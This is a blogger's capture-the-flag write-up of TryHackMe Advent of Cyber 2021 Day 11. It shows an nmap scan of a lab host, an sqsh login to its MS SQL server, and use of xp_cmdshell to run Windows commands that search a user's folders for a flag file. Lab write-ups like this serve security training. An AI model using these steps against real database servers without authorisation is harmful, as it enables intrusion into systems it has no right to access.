AoC3#11: Where Are The Reindeers
I’m now 46% of the way through the Advent of Cyber challenge, hosted by TryHackMe for December 2021. This writeup will cover Day 11, Where Are The Reindeers.
Previous writeups on my blog include Day 8 Santa’s Bag of Toys, Day 9 Where Is All This Data Going and Day 10 Offensive is the best Defence
CTF – Where Are The Reindeers
This challenge see’s me using sqsh – an interactive shell for MS-SQL databases.
We know that MS SQL Server is a Window’s based Relational Database Management System (RDBMS). As it’s hosted on a Microsoft Window’s box, scanning with nmap is likely be unable to find the host (by default).
└─$ nmap $IP -sT --top-ports=100
Starting Nmap 7.92 at 2021-12-18 06:13 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.11 seconds
As expected. I threw on the ‘assume the host is up‘ argument (-Pn):
└─$ nmap $IP -sT --top-ports=100 -Pn
Starting Nmap 7.92 at 2021-12-18 06:14 EST
Nmap scan report for 10.10.164.145
Host is up (0.040s latency).
Not shown: 96 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
{port}/tcp open ms-sql-s
{port}/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 2.11 seconds
With the port number, I connected to MS SQL remotely using the sqsh shell.
It’s possible to then query the names and schedule tables from within the reindeer schema.
We’re then asked to get some remote code execution going on, using the xp_cmdshell command. I’d never used this before so that was interesting to see. As a test, I dropped a simple network command:
1> xp_cmdshell 'ipconfig /all'
2> go
output
Windows IP Configuration
Host Name . . . . . . . . . . . . : AOC2021-MSSQL
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : eu-west-1.ec2-
...
Link-local IPv6 Address . . . . . : fe80::a845:5408:...
IPv4 Address. . . . . . . . . . . : 10.10.164.145(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.10.0.1
DHCP Server . . . . . . . . . . . : 10.10.0.1
DHCPv6 IAID . . . . . . . . . . . : 118418632
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-...
DNS Servers . . . . . . . . . . . : 10.0.0.2
NetBIOS over Tcpip. . . . . . . . : Enabled
...
I’m sure that’ll RCE will come in useful for future CTF events. So will this one:
2> xp_cmdshell path
3> go
...
PATH=C:\Windows\system32; C:\Windows; C:\Windows\System32\Wbem; C:\Windows\System32\WindowsPowerShell\v1.0\; C:\Windows\System32\OpenSSH\; C:\Program Files\Amazon\cfn-bootstrap\;C:\Program Files (x86)\Microsoft SQL Server
\150\DTS\Binn\; C:\Program Files\Azure Data Studio\bin; C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\; C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\; C:\Program Files\Microsoft SQL Server\150\Tools\Binn\; C:\Program Files\
Microsoft SQL Server\150\DTS\Binn\; C:\ProgramData\chocolatey\bin; C:\Windows\ServiceProfiles\MSSQLSERVER\AppData\Local\Microsoft\WindowsApps
By chaining two commands together, we browse to the grinch’s home directory and display it’s contents in one instruction. I do this as the xp_cmdshell seems to be stateless.
1> xp_cmdshell 'cd c:\users\grinch & dir'
2> go
output
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
NULL
Directory of c:\Users\grinch
NULL
11/10/2021 02:22 AM <DIR> .
11/10/2021 02:22 AM <DIR> ..
11/10/2021 02:22 AM <DIR> 3D Objects
11/10/2021 02:22 AM <DIR> Contacts
11/10/2021 02:22 AM <DIR> Desktop
11/10/2021 02:29 AM <DIR> Documents
11/10/2021 02:22 AM <DIR> Downloads
11/10/2021 02:22 AM <DIR> Favorites
11/10/2021 02:22 AM <DIR> Links
11/10/2021 02:22 AM <DIR> Music
11/10/2021 02:22 AM <DIR> Pictures
11/10/2021 02:22 AM <DIR> Saved Games
11/10/2021 02:22 AM <DIR> Searches
11/10/2021 02:22 AM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 5,452,894,208 bytes free
NULL
I then chained together a CD and a DIR command, to search for the flag automatically.
1> xp_cmdshell 'cd c:\users\grinch & dir "*flag*" /s /p'
2> go
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
...
Directory of c:\Users\grinch\Documents
11/10/2021 02:28 AM 21 flag.txt
1 File(s) 21 bytes
...
Probably shouldn’t have been surprised to find the file there, but the premise was still good. We can then use the type command to output the flag’s value.
With that flag revealed, I completed Day 11 of Advent for Cyber.
Again, I found this challenge enjoyable as it exposed me to two new things, sqsh and xp_cmdshell.